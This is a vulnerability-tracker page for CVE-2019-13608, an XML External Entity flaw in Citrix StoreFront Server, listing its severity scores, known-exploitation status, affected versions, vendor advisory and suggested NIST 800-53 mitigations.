Cyber Resilience

CVE-2019-13608

HighCISA KEVActive ExploitationEUVD ExploitedRansomware-linked

Published: 29 August 2019

Published
29 August 2019
Modified
06 November 2025
KEV Added
03 November 2021
Patch
CVSS Score v3.1 7.5 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EPSS Score 0.7167 98.8th percentile
Risk Priority 78 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2019-13608 is a high-severity Improper Restriction of XML External Entity Reference (CWE-611) vulnerability in Citrix Storefront Server. Its CVSS base score is 7.5 (High).

Operationally, ranked in the top 1.2% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

Citrix StoreFront Server versions before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) are affected by an XML External Entity vulnerability tracked as CVE-2019-13608 and CWE-611. The flaw received a CVSS 3.1 score of 7.5 with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N.

An unauthenticated remote attacker can send crafted XML input over the network to exploit the issue and obtain unauthorized access to sensitive files or internal resources on the server.

The referenced Citrix advisory CTX251988 describes available updates and configuration changes to resolve the exposure, while inclusion in the CISA Known Exploited Vulnerabilities catalog confirms observed real-world exploitation activity.

EU & UK References

Vulnerability details

Citrix StoreFront Server before 1903, 7.15 LTSR before CU4 (3.12.4000), and 7.6 LTSR before CU8 (3.0.8000) allows XXE attacks.

CWE(s)
KEV Date Added
03 November 2021

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

citrix
storefront server
1811 — 1903 · ≤ 3.12.4000 · ≤ 3.0.8000

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly requires validation and sanitization of XML input to block external entity declarations that enable the XXE attack described in CVE-2019-13608.

prevent

Mandates timely application of vendor patches (CTX251988) that eliminate the XXE flaw in the affected Citrix StoreFront versions.

prevent

Requires secure configuration of XML parsers to disable external entity processing, directly addressing the root cause of this unauthenticated remote XXE exposure.

References